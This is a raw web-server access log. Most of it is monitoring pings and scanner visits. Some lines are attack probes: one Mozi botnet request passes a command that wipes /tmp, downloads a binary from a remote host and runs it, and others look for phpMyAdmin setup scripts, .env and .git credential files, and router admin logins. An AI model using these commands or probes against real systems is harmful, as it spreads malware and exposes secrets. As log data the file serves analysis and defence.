212.91.246.72 - - [03/Nov/2022:20:02:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:20:03:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:20:04:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:20:05:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:20:06:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:20:07:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:20:08:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
39.68.116.213 - - [03/Nov/2022:20:09:14 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://39.68.116.213:60940/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 310 "-" "Hello, world"
212.91.246.72 - - [03/Nov/2022:20:09:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:20:10:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
41.216.183.144 - - [03/Nov/2022:20:10:54 +0100] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
41.216.183.144 - - [03/Nov/2022:20:10:54 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
41.216.183.144 - - [03/Nov/2022:20:10:54 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
41.216.183.144 - - [03/Nov/2022:20:10:54 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
41.216.183.144 - - [03/Nov/2022:20:10:54 +0100] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
41.216.183.144 - - [03/Nov/2022:20:10:54 +0100] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
212.91.246.72 - - [03/Nov/2022:20:11:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:20:12:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:20:13:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:20:14:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.252.255.180 - - [03/Nov/2022:20:14:45 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
212.91.246.72 - - [03/Nov/2022:20:15:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.83.144.103 - - [03/Nov/2022:20:16:07 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.83.144.103 - - [03/Nov/2022:20:16:08 +0100] "\x16\x03\x01\x01D\x01" 501 321 "-" "-"
212.91.246.72 - - [03/Nov/2022:20:16:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:20:17:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:20:18:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [03/Nov/2022:20:19:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [03/Nov/2022:20:19:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.206.243.220 - - [03/Nov/2022:20:20:10 +0100] "GET /explore HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Safari/605.1.15"
212.91.246.72 - - [03/Nov/2022:20:20:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.122.204.30 - - [03/Nov/2022:20:21:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [03/Nov/2022:20:21:35 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
31.220.1.83 - - [03/Nov/2022:20:21:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
185.122.204.30 - - [03/Nov/2022:20:21:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [03/Nov/2022:20:21:38 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
31.220.1.83 - - [03/Nov/2022:20:21:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [03/Nov/2022:20:21:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.1.83 - - [03/Nov/2022:20:22:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.1.83 - - [03/Nov/2022:20:22:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
185.122.204.30 - - [03/Nov/2022:20:22:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [03/Nov/2022:20:22:33 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
31.220.1.83 - - [03/Nov/2022:20:22:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [03/Nov/2022:20:22:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.1.83 - - [03/Nov/2022:20:23:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.1.83 - - [03/Nov/2022:20:23:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.1.83 - - [03/Nov/2022:20:23:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [03/Nov/2022:20:23:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.1.83 - - [03/Nov/2022:20:23:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [03/Nov/2022:20:24:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
161.35.168.165 - - [03/Nov/2022:20:25:05 +0100] "\x16\x03\x01" 501 318 "-" "-"
161.35.168.165 - - [03/Nov/2022:20:25:05 +0100] "\x16\x03\x01" 501 318 "-" "-"
161.35.168.165 - - [03/Nov/2022:20:25:05 +0100] "\x16\x03\x01" 501 318 "-" "-"
31.220.1.83 - - [03/Nov/2022:20:25:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [03/Nov/2022:20:25:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.236.176.191 - - [03/Nov/2022:20:25:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
149.56.150.170 - - [03/Nov/2022:20:26:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
149.56.150.170 - - [03/Nov/2022:20:26:27 +0100] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
149.56.150.170 - - [03/Nov/2022:20:26:27 +0100] "GET /sitemap.xml HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
149.56.150.170 - - [03/Nov/2022:20:26:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
149.56.150.170 - - [03/Nov/2022:20:26:28 +0100] "GET /ads.txt HTTP/1.1" 404 324 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
149.56.150.170 - - [03/Nov/2022:20:26:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 5.1.1; SM-G925F Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.94 Mobile Safari/537.36"
212.91.246.72 - - [03/Nov/2022:20:26:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.56.150.122 - - [03/Nov/2022:20:26:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
212.91.246.72 - - [03/Nov/2022:20:27:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.141.95.78 - - [03/Nov/2022:20:27:52 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [03/Nov/2022:20:28:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:20:29:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:20:30:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:20:31:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:20:32:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [03/Nov/2022:20:33:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [03/Nov/2022:20:33:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.61.187.101 - - [03/Nov/2022:20:34:04 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
185.16.38.231 - - [03/Nov/2022:20:34:11 +0100] "GET /.git/credentials HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.141 YaBrowser/22.3.3.852 Yowser/2.5 Safari/537.36"
183.136.225.32 - - [03/Nov/2022:20:34:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
183.136.225.32 - - [03/Nov/2022:20:34:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [03/Nov/2022:20:34:35 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [03/Nov/2022:20:34:35 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
212.91.246.72 - - [03/Nov/2022:20:34:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [03/Nov/2022:20:35:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [03/Nov/2022:20:35:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [03/Nov/2022:20:36:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [03/Nov/2022:20:36:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.142.125.213 - - [03/Nov/2022:20:36:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.213 - - [03/Nov/2022:20:36:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.213 - - [03/Nov/2022:20:36:51 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.213 - - [03/Nov/2022:20:36:52 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [03/Nov/2022:20:37:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:20:38:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.182 - - [03/Nov/2022:20:38:53 +0100] "\x16\x03\x01" 501 318 "-" "-"
45.61.187.101 - - [03/Nov/2022:20:39:42 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [03/Nov/2022:20:39:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:20:40:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:20:41:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:20:42:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.136.225.32 - - [03/Nov/2022:20:43:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
183.136.225.32 - - [03/Nov/2022:20:43:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [03/Nov/2022:20:43:11 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
183.136.225.32 - - [03/Nov/2022:20:43:12 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
141.255.166.2 - - [03/Nov/2022:20:43:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [03/Nov/2022:20:43:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.61.187.101 - - [03/Nov/2022:20:44:01 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [03/Nov/2022:20:44:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.138.117 - - [03/Nov/2022:20:45:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.117 - - [03/Nov/2022:20:45:43 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.117 - - [03/Nov/2022:20:45:43 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [03/Nov/2022:20:45:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.138.63 - - [03/Nov/2022:20:46:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.63 - - [03/Nov/2022:20:46:12 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.63 - - [03/Nov/2022:20:46:12 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [03/Nov/2022:20:46:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
78.142.18.92 - - [03/Nov/2022:20:46:59 +0100] "CONNECT ipinfo.io:443 HTTP/1.1" 405 339 "-" "Go-http-client/1.1"
212.91.246.72 - - [03/Nov/2022:20:47:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
46.101.158.89 - - [03/Nov/2022:20:47:51 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/Nov/2022:20:48:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:20:49:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [03/Nov/2022:20:50:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [03/Nov/2022:20:50:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:20:51:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:20:52:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:20:53:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:20:54:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:20:55:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:20:56:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.221.192.90 - - [03/Nov/2022:20:57:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [03/Nov/2022:20:57:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:20:58:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:20:59:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [03/Nov/2022:21:00:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [03/Nov/2022:21:00:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:21:01:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:21:02:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [03/Nov/2022:21:03:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [03/Nov/2022:21:03:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:21:04:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:21:05:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.61.187.101 - - [03/Nov/2022:21:05:53 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.80:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [03/Nov/2022:21:06:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.227.254.54 - - [03/Nov/2022:21:06:46 +0100] "\x03" 501 316 "-" "-"
212.91.246.72 - - [03/Nov/2022:21:07:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:21:08:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:21:09:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:21:10:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.255.166.2 - - [03/Nov/2022:21:11:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [03/Nov/2022:21:11:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:21:12:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.151 - - [03/Nov/2022:21:12:54 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/Nov/2022:21:13:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.171 - - [03/Nov/2022:21:14:16 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
141.255.166.2 - - [03/Nov/2022:21:14:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [03/Nov/2022:21:14:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:21:15:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
62.233.50.179 - - [03/Nov/2022:21:15:50 +0100] "\x03" 501 316 "-" "-"
62.233.50.179 - - [03/Nov/2022:21:15:51 +0100] "\x03" 501 316 "-" "-"
62.233.50.179 - - [03/Nov/2022:21:15:57 +0100] "\x03" 501 316 "-" "-"
62.233.50.179 - - [03/Nov/2022:21:16:00 +0100] "\x03" 501 316 "-" "-"
62.233.50.179 - - [03/Nov/2022:21:16:01 +0100] "\x03" 501 316 "-" "-"
212.91.246.72 - - [03/Nov/2022:21:16:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:21:17:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.206.161 - - [03/Nov/2022:21:17:54 +0100] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
192.241.207.109 - - [03/Nov/2022:21:18:03 +0100] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
192.241.207.109 - - [03/Nov/2022:21:18:25 +0100] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
192.241.207.109 - - [03/Nov/2022:21:18:27 +0100] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
192.241.207.109 - - [03/Nov/2022:21:18:38 +0100] "GET /actuator/health HTTP/1.1" 404 320 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/Nov/2022:21:18:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Nov/2022:21:19:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.206.161 - - [03/Nov/2022:21:19:54 +0100] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
192.241.206.161 - - [03/Nov/2022:21:20:01 +0100] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
192.241.206.161 - - [03/Nov/2022:21:20:04 +0100] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
